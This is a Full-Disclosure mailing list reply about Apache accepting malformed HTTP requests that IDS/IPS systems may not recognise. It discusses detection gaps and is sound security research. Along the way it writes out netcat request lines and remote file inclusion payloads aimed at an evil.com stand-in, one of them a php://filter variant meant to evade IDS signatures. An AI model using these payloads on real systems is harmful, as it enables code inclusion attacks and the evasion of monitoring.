On 20/06/07, 3APA3A <[EMAIL PROTECTED]> wrote: > Dear H D Moore, > > --Tuesday, June 19, 2007, 11:20:41 PM, you wrote to > [email protected]: > > HDM> $ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \ > HDM> nc webserver 80 > > According to recommendations of RFC 2616, section 4.1 Web server or > proxy server should ignore \r\n before request for compatibility with > odd clients sending trailing \r\n with POST requests via keep-alive > connections: > > In the interest of robustness, servers SHOULD ignore any empty > line(s) received where a Request-Line is expected. In other words, if > the server is reading the protocol stream at the beginning of a > message and receives a CRLF first, it should ignore the CRLF. > > $ echo -ne " /buggy.php HTTP/1.0\r\n\r\n" | nc webserver 80 > > Does the same job. This problem (unsupported request method) was already > reported by Michal Majchrowicz, see > > http://securityvulns.com/Qdocument846.html
(This is what I gathered from the original posting, but I might be wrong.) I think the issue is not that the apache server behaviour is wrong as such, but that IDS/IPS do not use the same algorithm as apache for checking validity of HTTP requests. Thus apache may accept and process a request like: \r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n but that the IDS/IPS will ignore that packet on the grounds that "it's not a valid HTTP request"., when it should actually be alerting that a RFI attempt was made. While we're on the subject of IDS, it looks like PHP 5 supports a new wrapper php://filter, such that a RFI may be performed by: GET /rfi.php?includedir=php://filter/resource=http://www.evil.com - which may not be detected by some existing IDS signatures. (See http://uk2.php.net/manual/en/wrappers.php.php ) cheers, Jamie -- Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED] UK Honeynet Project: http://www.ukhoneynet.org/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
